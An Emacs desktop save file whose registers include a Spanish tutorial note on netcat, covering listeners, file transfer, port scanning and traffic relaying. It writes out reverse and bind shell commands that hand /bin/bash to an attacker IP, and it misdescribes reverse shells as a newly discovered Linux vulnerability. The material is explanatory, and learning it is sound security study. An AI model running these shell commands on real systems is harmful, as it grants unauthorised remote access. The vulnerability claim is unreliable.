;; -*- mode: emacs-lisp; lexical-binding:t; coding: utf-8-emacs; -*-
;; --------------------------------------------------------------------------
;; Desktop File for Emacs
;; --------------------------------------------------------------------------
;; Created Wed Aug 31 11:04:41 2022
;; Desktop file format version 208
;; Emacs version 28.1

;; Global section:
(setq desktop-saved-frameset nil)
(setq desktop-missing-file-warning nil)
(setq tags-file-name nil)
(setq tags-table-list nil)
(setq search-ring nil)
(setq regexp-search-ring '(#("pac" 0 3 (isearch-case-fold-search t)) #("contin" 0 6 (isearch-case-fold-search t)) #("org-mode" 0 8 (isearch-case-fold-search t)) #("break" 0 5 (isearch-case-fold-search t)) #("," 0 1 (isearch-case-fold-search t)) #("phi" 0 3 (isearch-case-fold-search t)) #("emp" 0 3 (isearch-case-fold-search t)) #("ita" 0 3 (isearch-case-fold-search t)) #("appt" 0 4 (isearch-case-fold-search t)) #("compart" 0 7 (isearch-case-fold-search t)) #("sincro" 0 6 (isearch-case-fold-search t)) #("my-org" 0 6 (isearch-case-fold-search t)) #("roam" 0 4 (isearch-case-fold-search t)) #("tree" 0 4 (isearch-case-fold-search t)) #("org-agenda" 0 10 (isearch-case-fold-search t)) #("emacs" 0 5 (isearch-case-fold-search t))))
(setq register-alist '((108 . [105 escape escape 108 108 105 113 escape escape 97 escape]) (99 . #("bootstrap: [AppComponent]" 0 11 (fontified t font-lock-fontified t src-block t font-lock-multiline t face (org-block)) 11 12 (fontified t font-lock-fontified t src-block t font-lock-multiline t face (rainbow-delimiters-depth-3-face org-block)) 12 24 (fontified t font-lock-fontified t src-block t font-lock-multiline t face (org-block)) 24 25 (fontified t font-lock-fontified t src-block t font-lock-multiline t face (rainbow-delimiters-depth-3-face org-block)))) (122 . #("  // Aquí se meten los servicios\n  providers: [\n    ServicioEmpleadosService,\n    EmpleadosService,  // Nuevo Data Service\n    // Servicio que conecta con Firebase\n    FirebaseService\n  ],\n  bootstrap: [AppComponent]\n" 0 2 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2 5 (face (font-lock-comment-delimiter-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5 33 (face (font-lock-comment-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 33 46 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 46 47 (face (rainbow-delimiters-depth-3-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 47 48 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 48 78 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 78 101 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 101 104 (face (font-lock-comment-delimiter-face org-block) org-emphasis t font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 104 123 (face (font-lock-comment-face org-block) org-emphasis t font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 123 127 (face (org-block) org-emphasis t font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 127 129 (face (font-lock-comment-delimiter-face org-block) org-emphasis t font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 129 130 (face (font-lock-comment-delimiter-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 130 164 (face (font-lock-comment-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 164 184 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 184 186 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 186 187 (face (rainbow-delimiters-depth-3-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 187 189 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 189 202 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 202 203 (face (rainbow-delimiters-depth-3-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 203 215 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 215 216 (face (rainbow-delimiters-depth-3-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 216 217 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)))) (102) (104 . "kkkkkk") (111 . [escape escape escape]) (106 . [107 106 escape escape]) (119 . "org-mode-hook") (120 . #("  bootstrap: [AppComponent]\n" 0 13 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 13 14 (face (rainbow-delimiters-depth-3-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 14 26 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 26 27 (face (rainbow-delimiters-depth-3-face org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 27 28 (face (org-block) font-lock-multiline t src-block t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)))) (107 . [(down-mouse-1 ("Unprintable entity" 211 (183 . 201) 84076650 nil 211 (18 . 7) nil (183 . 40) (10 . 23))) (mouse-1 ("Unprintable entity" 211 (183 . 201) 84076827 nil 211 (18 . 7) nil (183 . 40) (10 . 23))) (mouse-1 ("Unprintable entity" 211 (183 . 201) 84076827 nil 211 (18 . 7) nil (183 . 40) (10 . 23))) 113 107 106 100 100 escape 58 119 return 107 107 107 107 107 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 108 105 45 escape 106 105 45 escape 106 105 45 escape 106 105 45 escape 106 105 45 escape 58 119 return 134217848 108 101 100 103 101 114 32 115 116 97 116 return]) (97 . [escape 58 119 return]) (110) (113) (48 . #("Netcat es una herramienta que permite leer y escribir información a través de conexiones de datos.\nPodemos usar protocolos UDP o TCP.\n\nA esta herramienta se le conoce como \"La Navaja Suiza de las Redes\" (Networking).\n\n* Variantes\n\nNetcat tiene variantes que dependen del sistema operativo.\nPero las funcionalidades principales están en todas las variantes disponibles, así que no hay problema alguno en escoger la que querramos.\nSi instalamos varias versiones de este programa, tenemos que dar el path completo del binario para correrlo desde el shell.\n\n** Netcat traditional\n:PROPERTIES:\n:ID:       44c6234a-7719-48bc-ab24-4778556d7adb\n:END:\n\nEs la implementación original de =netcat= creada por Hobbit.\nEsta versión viene en distribuciones como Kali.\nNo tiene mantenimiento desde la versión 1.10\n\nUna diferencia entre esta y otras versiones es la opción ~-e~ que permite correr script del programa.\nSe le considera un problema de seguridad y en otra versiones no está disponible.\n\n** GNU Netcat\n:PROPERTIES:\n:ID:       271bdec0-b25c-4823-b96d-37e1de1a69ba\n:END:\n\nLa versión que cumple con las leyes GNU.\nEs una versión reescrita desde cero para que sea más compatible.\n\nPero es una paquete que tampoco tiene mantinimiento.\nDesde la versión 0.7.1 del año 2004 que no hay actualizaciones.\n\n** OpenBSD Netcat\n:PROPERTIES:\n:ID:       7cf1d1e6-bd87-4a6f-a9d2-73f7ff6c0055\n:END:\n\nEsta la versión que más se usa actualmente.\nEs la que vamos a encontrar en la mayoría de distribuciones linux.\nEs otro rewrite de la versión tradicional.\n\nEsta versión tiene soporte para IPv6, proxies y unix sockets.\nY además tiene varios cambios para asegurar la seguridad.\n\n** Ncat\n:PROPERTIES:\n:ID:       449a2ff2-67a8-4c3b-8730-c8b4b0067c56\n:END:\n\nEs la versión de =netcat= creada por el proyecto =nmap=.\nTiene muchas más características y es la que recomienda el autor de este blog.\n\n* Feautures\n\nAhora, vamos a ver lo que podemos llegar a hacer con esta herramienta.\n\n** Server/Client mode\n\n*** Server\n\nEn modo servidor, =netcat= usa un puerto para poder escuchar conexiones a este.\nEl puerto puede ser tcp o udp.\nPor defecto, el programa escucha en tcp.\n\n#+begin_src bash\nnc -lvnp 8080\n#+end_src\n\nEste comando escucha en todas las interfaces del puerto 8080.\n\nSi queremos escuchar solo al localhost usando netcat-openbsd:\n\n#+begin_src bash\nnc -s 127.0.0.1 -lvnp 8080\n#+end_src\n\nEn =ncat= es diferete la syntax para el mismo proposito:\n\n#+begin_src bash\nncat -lvn 127.0.0.1 8080\n#+end_src\n\nSi queremos escuchar en tcp, debemos incluir la opción ~-u~\n\n#+begin_src bash\nnc -l -u -v -n -p 8080\n#+end_src\n\n*** Client mode\n\nEn este modo, nos podemos conectar a un puerto abierto en cualquier sistema.\nEs de ayuda para checar si un puerto está abierto.\n\nPor ejemplo, supongamos que tenemos el puerto 8080 abierto en la ip =127.0.0.1=. Nos podemos conectar usando tcp con el siguiente comando:\n\n#+begin_src bash\nnc -vn 127.0.0.1 8080\n#+end_src\n\nO podemos usar udp\n\n#+begin_src bash\nnc -uvn 127.0.0.1 8080\n#+end_src\n\n** Reverse/Bind Shells\n\nReverse shells es una vulnerabilidad que se acaba de descubrir en Linux.\nPermite ejecutar comandos en un servidor remoto sin tener necesariamente los permisos.\n\nEn su momento, cuando funcionaba el comando era posible hacerlo usando todas las versiones a excepción de =netcat-openbsd=, que consideraba esta característica un riesgo de seguridad.\n\n*** Reverse shell\n:PROPERTIES:\n:ID:       2a5f35e7-346b-4d52-8c0f-37938ceaa751\n:END:\n\nEl reverse shell consiste en escuchar por conexiones para proveer un shell al cliente\nUna vez que el cliente recibe el shell, podemos correr comandos en este.\n\nPara hacer un reverse shell, netcat debe estar en modo servidor.\nEl servidor sería considerado la maquina atacante y el cliente sería la victima.\n\nEn el server corremos ~nc -lvnp 8080~.\nEn el cliente corremos ~nc -e /bin/bash 192.168.125.10 8080~.\n\n*** Bind\n\nUn bind shell es una shell en el servidor a la que podemos conectarnos a través de un puerto abierto en el que podemos ejecutar comandos.\nLo podemos ver como que el servidor será la victima y el cliente será el atacante.\n\nEn el servidor, la victima, debemos correr: ~nc -e /bin/bash -lvnp 8080~.\nY en el cliente, el atacante, debemos correr: ~nc 192.168.125.10 8080~.\n\n\n** File transfer\n\nComo =netcat= puede escribir directamente a las conexiones, es posible que insertemos archivos enteros a la conexión.\n\nEn este modo, no distinguimos quién es el servidor y quien el cliente.\nLo que sí es importante es que debe establecerse quién es el listener primero.\n\nSupongamos que queremos mandar un archivo en el server1 al server2 por el puerto 8080:\n\n#+begin_src bash\nnc -lvnp 8080 < infile   # (server1)\n#+end_src\n\n#+begin_src bash\nnc 192.168.125.10 8080 > outfile  # (server2)\n#+end_src\n\nSi queremos hacerlo en el sentido contrario:\n\n#+begin_src bash\nnc 192.168.125.20 8080 < infile # (server1)\n#+end_src\n\n#+begin_src bash\nnc -lvnp 8080 > outfile # (server2)\n#+end_src\n\n** Port scanning\n\nEste modo nos permite poder saber qué puertos de nuestro sistema están abiertos.\nNo está implementado en =ncat=, porque dentro del mismo proyecto tienen =nmap=.\n\nEntonces, podemos usar =netcat-openbsd= para ver los puertos que si están escuchando.\nDepende el tipo de conexión tcp o udp, tenemos que correr un comando diferente.\n\n#+begin_src bash\nnc -nvv -w 1 -z 127.0.0.1 1-1000 # tcp\n#+end_src\n\n#+begin_src bash\nnc -nvv -w 1 -z -u 127.0.0.1 1-1000 # udp\n#+end_src\n\n\n** Traffic Redirection\n\nSolo disponible para versiones con la opción ~-e~ disponible.\nSupongamos que tenemos el escenario en que tenemos acceso a un servidor2 desde un servidor1, pero no podemos entrar a un serivdor3 desde el servidor1.\nLo que debemos hacer para conectarnos al servidor3 desde el servidor1 es usar el servidor2 como un intermediario.\n\n~server1 <-------------> server2 <-------------> server3~\n\nLo que hacemos en el server2 es redirigir el tráfico que recibe del puerto 8080 al servidor3.\n\n#+begin_src bash\nnc -klvnp 8000 -e \"/bin/nc 192.168.125.40 8080\"\n#+end_src\n\n\n* Aditional Features\n\nTodos los ejemplos anteriores son considerados riesgos de seguridad ya que no hay ninguna forma de indentificar o proteger la conexión entre las dos partes.\n\n** Encrypted Shells\n\nPara asegurarnos que la información que está circulando esté protegida podemos usar =ssl=.\nPor ejemplo, cuando estamos usando un reverse/bind shell podemos hacerlo de manera encriptada.\n\nCorremos en lado atacante ~nc --ssl -lvnp 8080~ y ~nc --ssl -e /bin/bash 192.168.125.10 8080~ en el victima.\n\n** Access control\n\nEn el modo servidor, podemos usar ~--alow~ para especificar desde cuáles direcciones podemos aceptar conexiones a nuestro listener.\nTambién podemos hacer lo contrario con ~--deny~.\n\n* Conclusión\n\n=netcat= es una herramienta que debes aprender si deseas dedicarte de manera profesional o como hobbie al mundo de la seguridad.\n\nEs muy común ver gente usando =netcat= en competencias de hacking debido a su flexibilidad y capacidad.\n" 0 99 (fontified t yank-handler (evil-yank-line-handler nil t)) 99 134 (fontified t yank-handler (evil-yank-line-handler nil t)) 134 135 (fontified t yank-handler (evil-yank-line-handler nil t)) 135 217 (fontified t yank-handler (evil-yank-line-handler nil t)) 217 218 (fontified t yank-handler (evil-yank-line-handler nil t)) 218 219 (face (org-superstar-header-bullet org-level-1) fontified t yank-handler (evil-yank-line-handler nil t)) 219 220 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 220 229 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 229 230 (fontified t yank-handler (evil-yank-line-handler nil t)) 230 231 (fontified t yank-handler (evil-yank-line-handler nil t)) 231 290 (fontified t yank-handler (evil-yank-line-handler nil t)) 290 429 (fontified t yank-handler (evil-yank-line-handler nil t)) 429 553 (fontified t yank-handler (evil-yank-line-handler nil t)) 553 554 (fontified t yank-handler (evil-yank-line-handler nil t)) 554 555 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 555 556 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 556 557 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 557 575 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 575 576 (fontified t yank-handler (evil-yank-line-handler nil t)) 576 588 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 588 589 (fontified t yank-handler (evil-yank-line-handler nil t)) 589 593 (face org-special-keyword fontified t yank-handler (evil-yank-line-handler nil t)) 593 600 (fontified t yank-handler (evil-yank-line-handler nil t)) 600 636 (face org-property-value fontified t yank-handler (evil-yank-line-handler nil t)) 636 637 (fontified t yank-handler (evil-yank-line-handler nil t)) 637 642 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 642 643 (fontified t yank-handler (evil-yank-line-handler nil t)) 643 644 (fontified t yank-handler (evil-yank-line-handler nil t)) 644 677 (fontified t yank-handler (evil-yank-line-handler nil t)) 677 685 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 685 705 (fontified t yank-handler (evil-yank-line-handler nil t)) 705 753 (fontified t yank-handler (evil-yank-line-handler nil t)) 753 798 (fontified t yank-handler (evil-yank-line-handler nil t)) 798 799 (fontified t yank-handler (evil-yank-line-handler nil t)) 799 856 (fontified t yank-handler (evil-yank-line-handler nil t)) 856 860 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 860 901 (fontified t yank-handler (evil-yank-line-handler nil t)) 901 982 (fontified t yank-handler (evil-yank-line-handler nil t)) 982 983 (fontified t yank-handler (evil-yank-line-handler nil t)) 983 984 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 984 985 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 985 986 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 986 996 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 996 997 (fontified t yank-handler (evil-yank-line-handler nil t)) 997 1009 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 1009 1010 (fontified t yank-handler (evil-yank-line-handler nil t)) 1010 1014 (face org-special-keyword fontified t yank-handler (evil-yank-line-handler nil t)) 1014 1021 (fontified t yank-handler (evil-yank-line-handler nil t)) 1021 1057 (face org-property-value fontified t yank-handler (evil-yank-line-handler nil t)) 1057 1058 (fontified t yank-handler (evil-yank-line-handler nil t)) 1058 1063 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 1063 1064 (fontified t yank-handler (evil-yank-line-handler nil t)) 1064 1065 (fontified t yank-handler (evil-yank-line-handler nil t)) 1065 1090 (fontified t yank-handler (evil-yank-line-handler nil t)) 1090 1106 (fontified t yank-handler (evil-yank-line-handler nil t)) 1106 1171 (fontified t yank-handler (evil-yank-line-handler nil t)) 1171 1172 (fontified t yank-handler (evil-yank-line-handler nil t)) 1172 1225 (fontified t yank-handler (evil-yank-line-handler nil t)) 1225 1289 (fontified t yank-handler (evil-yank-line-handler nil t)) 1289 1290 (fontified t yank-handler (evil-yank-line-handler nil t)) 1290 1291 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 1291 1292 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 1292 1293 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 1293 1307 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 1307 1308 (fontified t yank-handler (evil-yank-line-handler nil t)) 1308 1320 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 1320 1321 (fontified t yank-handler (evil-yank-line-handler nil t)) 1321 1325 (face org-special-keyword fontified t yank-handler (evil-yank-line-handler nil t)) 1325 1332 (fontified t yank-handler (evil-yank-line-handler nil t)) 1332 1368 (face org-property-value fontified t yank-handler (evil-yank-line-handler nil t)) 1368 1369 (fontified t yank-handler (evil-yank-line-handler nil t)) 1369 1374 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 1374 1375 (fontified t yank-handler (evil-yank-line-handler nil t)) 1375 1376 (fontified t yank-handler (evil-yank-line-handler nil t)) 1376 1420 (fontified t yank-handler (evil-yank-line-handler nil t)) 1420 1487 (fontified t yank-handler (evil-yank-line-handler nil t)) 1487 1530 (fontified t yank-handler (evil-yank-line-handler nil t)) 1530 1531 (fontified t yank-handler (evil-yank-line-handler nil t)) 1531 1593 (fontified t yank-handler (evil-yank-line-handler nil t)) 1593 1651 (fontified t yank-handler (evil-yank-line-handler nil t)) 1651 1652 (fontified t yank-handler (evil-yank-line-handler nil t)) 1652 1653 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 1653 1654 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 1654 1655 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 1655 1659 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 1659 1660 (fontified t yank-handler (evil-yank-line-handler nil t)) 1660 1672 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 1672 1673 (fontified t yank-handler (evil-yank-line-handler nil t)) 1673 1677 (face org-special-keyword fontified t yank-handler (evil-yank-line-handler nil t)) 1677 1684 (fontified t yank-handler (evil-yank-line-handler nil t)) 1684 1720 (face org-property-value fontified t yank-handler (evil-yank-line-handler nil t)) 1720 1721 (fontified t yank-handler (evil-yank-line-handler nil t)) 1721 1726 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 1726 1727 (fontified t yank-handler (evil-yank-line-handler nil t)) 1727 1728 (fontified t yank-handler (evil-yank-line-handler nil t)) 1728 1745 (fontified t yank-handler (evil-yank-line-handler nil t)) 1745 1753 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 1753 1777 (fontified t yank-handler (evil-yank-line-handler nil t)) 1777 1783 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 1783 1785 (fontified t yank-handler (evil-yank-line-handler nil t)) 1785 1864 (fontified t yank-handler (evil-yank-line-handler nil t)) 1864 1865 (fontified t yank-handler (evil-yank-line-handler nil t)) 1865 1866 (face (org-superstar-header-bullet org-level-1) fontified t yank-handler (evil-yank-line-handler nil t)) 1866 1867 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 1867 1876 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 1876 1877 (fontified t yank-handler (evil-yank-line-handler nil t)) 1877 1878 (fontified t yank-handler (evil-yank-line-handler nil t)) 1878 1949 (fontified t yank-handler (evil-yank-line-handler nil t)) 1949 1950 (fontified t yank-handler (evil-yank-line-handler nil t)) 1950 1951 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 1951 1952 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 1952 1953 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 1953 1971 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 1971 1972 (fontified t yank-handler (evil-yank-line-handler nil t)) 1972 1973 (fontified t yank-handler (evil-yank-line-handler nil t)) 1973 1974 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 1974 1975 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 1975 1976 (face (org-superstar-header-bullet org-level-3) fontified t yank-handler (evil-yank-line-handler nil t)) 1976 1977 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 1977 1983 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 1983 1984 (fontified t yank-handler (evil-yank-line-handler nil t)) 1984 1985 (fontified t yank-handler (evil-yank-line-handler nil t)) 1985 2003 (fontified t yank-handler (evil-yank-line-handler nil t)) 2003 2011 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 2011 2065 (fontified t yank-handler (evil-yank-line-handler nil t)) 2065 2096 (fontified t yank-handler (evil-yank-line-handler nil t)) 2096 2137 (fontified t yank-handler (evil-yank-line-handler nil t)) 2137 2138 (fontified t yank-handler (evil-yank-line-handler nil t)) 2138 2154 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2154 2155 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2155 2157 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2157 2158 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2158 2163 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2163 2169 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2169 2178 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2178 2179 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 2179 2180 (fontified t yank-handler (evil-yank-line-handler nil t)) 2180 2242 (fontified t yank-handler (evil-yank-line-handler nil t)) 2242 2243 (fontified t yank-handler (evil-yank-line-handler nil t)) 2243 2305 (fontified t yank-handler (evil-yank-line-handler nil t)) 2305 2306 (fontified t yank-handler (evil-yank-line-handler nil t)) 2306 2322 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2322 2323 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2323 2325 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2325 2326 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2326 2328 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2328 2339 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2339 2344 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2344 2350 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2350 2359 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2359 2360 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 2360 2361 (fontified t yank-handler (evil-yank-line-handler nil t)) 2361 2364 (fontified t yank-handler (evil-yank-line-handler nil t)) 2364 2370 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 2370 2418 (fontified t yank-handler (evil-yank-line-handler nil t)) 2418 2419 (fontified t yank-handler (evil-yank-line-handler nil t)) 2419 2435 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2435 2436 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2436 2440 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2440 2441 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2441 2445 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2445 2461 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2461 2470 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2470 2471 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 2471 2472 (fontified t yank-handler (evil-yank-line-handler nil t)) 2472 2527 (fontified t yank-handler (evil-yank-line-handler nil t)) 2527 2531 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 2531 2532 (fontified t yank-handler (evil-yank-line-handler nil t)) 2532 2533 (fontified t yank-handler (evil-yank-line-handler nil t)) 2533 2549 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2549 2550 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2550 2552 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2552 2553 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2553 2555 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2555 2556 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2556 2558 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2558 2559 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2559 2561 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2561 2562 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2562 2564 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2564 2565 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2565 2567 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2567 2573 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2573 2582 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2582 2583 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 2583 2584 (fontified t yank-handler (evil-yank-line-handler nil t)) 2584 2585 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 2585 2586 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 2586 2587 (face (org-superstar-header-bullet org-level-3) fontified t yank-handler (evil-yank-line-handler nil t)) 2587 2588 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 2588 2599 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 2599 2600 (fontified t yank-handler (evil-yank-line-handler nil t)) 2600 2601 (fontified t yank-handler 